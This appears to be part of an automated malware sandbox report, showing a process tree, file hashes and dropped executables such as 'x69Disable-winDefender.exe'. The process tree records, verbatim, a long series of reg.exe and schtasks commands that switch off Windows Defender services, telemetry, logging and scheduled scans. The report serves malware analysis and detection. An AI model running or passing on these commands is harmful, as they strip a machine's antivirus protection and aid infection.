          • Modifies Windows Defender Real-time Protection settings
          PID:2896
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
          5⤵
          PID:1492
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
          5⤵
          PID:3012
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
          5⤵
          PID:5900
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
          5⤵
          PID:1488
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
          5⤵
          PID:4488
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
          5⤵
          PID:2608
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
          5⤵
          PID:1596
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
          5⤵
          PID:4780
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
          5⤵
          PID:5236
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
          5⤵
          PID:4644
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
          5⤵
          PID:5076
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
          5⤵
          PID:2536
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
          5⤵
          PID:4964
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
          5⤵
          PID:2576
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
          5⤵
          PID:2664
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
          5⤵
          PID:4492
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
          5⤵
          • Modifies Security services
          PID:6060
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
          5⤵
          • Modifies Security services
          PID:3512
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
          5⤵
          • Modifies Security services
          PID:5908
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
          5⤵
          • Modifies Security services
          PID:5400
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
          5⤵
          • Modifies security service
          PID:1576
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe
    2⤵
    • Suspicious use of WriteProcessMemory
    PID:920
    • C:\Users\Admin\AppData\Roaming\x69install.exe
      C:\Users\Admin\AppData\Roaming\x69install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2356
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  1⤵
  PID:3668
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  1⤵
  PID:3844
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  • Modifies registry class
  PID:4008
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  PID:3792
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  1⤵
  PID:2024
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  PID:5324
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
  1⤵
  PID:5976
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k netsvcs -p
  1⤵
  PID:5204
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  1⤵
  PID:5332
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  1⤵
  • Modifies data under HKEY_USERS
  PID:2908
• C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  1⤵
  • Drops file in System32 directory
  • Modifies data under HKEY_USERS
  PID:3432
                                                                                                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:512
                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5624
                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:5084
                                                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:2840
                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1668
                                                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5756
                                                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:3224
                                                                                                                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                              PID:4576
                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5868
                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:2392
                                                                                                                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4448
                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4956
                                                                                                                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                      PID:468
                                                                                                                                                                                                                    • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                                      C:\Windows\System32\sihclient.exe /cv rxwFBNp42kmv9L8vTNvaXw.0.2
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:2896
                                                                                                                                                                                                                      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                                                                        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1820
                                                                                                                                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:920
                                                                                                                                                                                                                          • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                                                                            "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:4580

Network

MITRE ATT&CK Enterprise v16


Downloads

• C:\Program Files\7-Zip\Uninstall.exe
  Filesize: 31KB
  MD5: 405c009705fcdc96c87578c57acccf0c
  SHA1: 1fa7e550b30f2c4261c70804e17691841b9a6d2b
  SHA256: bfb7d35e37adabb0647e854d881bce44f69dc63cd3447b08c086254cd1a4e5ae
  SHA512: e5377852087335bed3c8598425f5398b9eded1cebba01358f54147d7fc7f54adcce7a3281005c94948e706314a3a652d1cbc2d8e013a5e44439aa217840ea986

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x69.exe.log
  Filesize: 654B
  MD5: 2ff39f6c7249774be85fd60a8f9a245e
  SHA1: 684ff36b31aedc1e587c8496c02722c6698c1c4e
  SHA256: e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
  SHA512: 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

• C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\49UOMM1O\k1[2].rar
  Filesize: 1B
  MD5: 68b329da9893e34099c7d8ad5cb9c940
  SHA1: adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
  SHA256: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
  SHA512: be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 18470dd1aa7811c5a9825ea59429223b
  SHA1: 75859ea7baf1a8f5ba652ca783bb15f07615cc32

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    98616a32e387ad9ae2f6faddc53cd60e0ba50fe4088abdc51b82b309cc8771bd

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    cc8ff35595460d3ef16589cbab347ac07eff8b62766bfbceb386507ac631d433a2aa9187b0d6cef2b30b1fa08c92bc5a0061e984cc37c378119dcf51212f3def

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    944B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    cae60f0ddddac635da71bba775a2c5b4

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    386f1a036af61345a7d303d45f5230e2df817477

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    944B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    04114c0529b116bf66d764ff6a5a8fe3

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    0caeff17d1b2190f76c9bf539105f6c40c92bd14

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    fd7092b4e273314186bad6ce71aa4cd69450736b6ec6cc746868997ff82a7532

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    6a718c330824346606ef24f71cca6be0bfafc626b1d2b060b36e919ab07f3d6a345f56cace8a5a84ffbe2183976eb197842c9fd2f3e3b8c8dd307057d59d6f26

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    944B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    e3161f4edbc9b963debe22e29658050b

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    45dbf88dadafe5dd1cfee1e987c8a219d3208cdb

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    944B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    dbb22d95851b93abf2afe8fb96a8e544

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    920ec5fdb323537bcf78f7e29a4fc274e657f7a4

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    944B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    7617aaec2e7f76b18bf7cb267ba9ffee

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    32ce7ba27edd8ca452c6bd303fbab2fac651edcb

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    462808192f94709ea51d6cc2cf9477692b576ced96f16278b4d5d3c115257e42

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    db00784bc8b098281dab7be9e3c7eb208cb116a7034c72f8187126cab37cbbc61d33f273d12830229d288862ba04424dc886b4b6bc760f501861c6134e804620

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    944B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    d8cb3e9459807e35f02130fad3f9860d

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    5af7f32cb8a30e850892b15e9164030a041f4bd6

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    944B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    34f595487e6bfd1d11c7de88ee50356a

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    4caad088c15766cc0fa1f42009260e9a02f953bb

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    944B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    ba169f4dcbbf147fe78ef0061a95e83b

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    92a571a6eef49fff666e0f62a3545bcd1cdcda67

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    944B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    49ef5aaa2f6339dfabb8f3e0cf119c52

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    d6ee05dc442fbab25b94feb3cc8d924d3a17e3e7

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    eaf3f4e0f03127cf39bd880c27cf370ea606ee43805c6383b50cff0283d85126

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    f8adeeb12eca228af0c9373c876ac96586d362aeed071dbe84f4750cb599ec2149dac216bcc92629c37e872132be80c336bc6361568371f0ec0d808b7073321b

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize: 944B
    MD5: 04f1d68afbed6b13399edfae1e9b1472
    SHA1: 8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0
    SHA256: f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de
    SHA512: 30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 948B
    MD5: c65738617888921a153bd9b1ef516ee7
    SHA1: 5245e71ea3c181d76320c857b639272ac9e079b1
    SHA256: 4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26
    SHA512: 2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: 029fbf628b046653ab7ff10b31deeeb2
    SHA1: 93c2cb1905c8f5e71f5ea97a1e8a8c891eae077c
    SHA256: 85f6b0971e94daf9fd4e39413824f162851a9f5ce7f989bd92c903a4dbcbef26
    SHA512: d4e3626dba2572bd1e53446b384962f955cc0c7e56a72cacf50a845d74714ec1020bcb0fdcc50636a1dfd4f08dc34143dbb5638dd90180df6aa31dab9228c98c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 948B
    MD5: c1a54dd5a1ab44cc4c4afd42f291c863
    SHA1: b77043ab3582680fc96192e9d333a6be0ae0f69d
    SHA256: c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75
    SHA512: 010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 948B
    MD5: 217d9191dfd67252cef23229676c9eda
    SHA1: 80d940b01c28e3933b9d68b3e567adc2bac1289f
    SHA256: e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133
    SHA512: 86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 948B
    MD5: dcc3133a2a20a294255a82d2b97c61c7
    SHA1: 53d0acdc354df3f3df9879aaf349cafdd24c12f4
    SHA256: cf462864912a95f27b59b1f1818a3e615db55646315dc6fb9742d199345ff207
    SHA512: 06c50d23012cc6a84c99ba7c98903d6e379eaf6cc87af67580254a938aaf70d91556fb8efe52f0fa097629591023efb8568e85069a9f1c3a3c8bff463247e8c3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: bff40f276a226f034b787f99c89265e2
    SHA1: d76b2a597bb086596be9e7e623fa3a7cbcd6010f
    SHA256: a2a13ef5026666b04db2d8db530a9eebccc5058e9241427a8d6703bc90eaa002
    SHA512: f040f085451b7a415f64a16fcd25487abe8465e7d5654a2edb65d1502cfd8df1dd979855178965df12f4bb9f50c9f58ecafe6bb72dc1dd7c7d9758f4b2e4e458

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: 1542328a8546914b4e2f1aef9cb42bea
    SHA1: 7a0ac5969dfb20eb974e8a3bd8707243fa68f94f
    SHA256: 7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737
    SHA512: b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 64B
    MD5: 5caad758326454b5788ec35315c4c304
    SHA1: 3aef8dba8042662a7fcf97e51047dc636b4d4724
    SHA256: 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
    SHA512: 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: ef72c47dbfaae0b9b0d09f22ad4afe20
    SHA1: 5357f66ba69b89440b99d4273b74221670129338
    SHA256: 692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f
    SHA512: 7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

  • C:\Users\Admin\AppData\Local\Temp\07C96AED.exe
    Filesize: 1B
    MD5: 69691c7bdcc3ce6d5d8a1361f22d04ac
    SHA1: c63ae6dd4fc9f9dda66970e827d13f7c73fe841c
    SHA256: 08f271887ce94707da822d5263bae19d5519cb3614e0daedc4c7ce5dab7473f1
    SHA512: 253405e03b91441a6dd354a9b72e040068b1bfe10e83eb1a64a086c05525d8ccae2bf09130c624af50d55c3522a4fbb7c18cfc8dd843e5f4801d9ad2b5164b12

  • C:\Users\Admin\AppData\Local\Temp\923D.tmp\923E.tmp\923F.bat
    Filesize: 4KB
    MD5: 2df9441936169e60a9631bf730cd4273
    SHA1: 979ee79524023a77b9577d077a3472b87fda9834
    SHA256: 24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e
    SHA512: ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xnb0av0e.gab.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256:

                                                                                                                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    15KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    56b2c3810dba2e939a8bb9fa36d3cf96

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\x69.exe

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    68KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    143b1a26c0fdda10f74ba1b6249e020a

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    30a01b28f4f205bc594f8d6665963eaa49d172e3

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    83f2f88a1de9b022867ba3659074b0c349e24d2de7d0e01e136a325a5d5eed65

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    06fca2ea01ce1828ae7f08c17d7ae111d75ae5b4c0c01c618a02551300bf25c7ad17abcb078eb0a4082bf74a052fcd3f8f63122251cf5884ec97099f495a9ce0

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    22d6b7ab5c8a05162d36d2981b715c28

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    7adc2e2c90b8dfcee0c34a86ad4d0cac79daf9f3

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    f12428dc9c9f900d671d4135cfda52b7de9bfb6b34c5c336dbf88941db8575e1

                                                                                                                                                                                                                                    SHA512

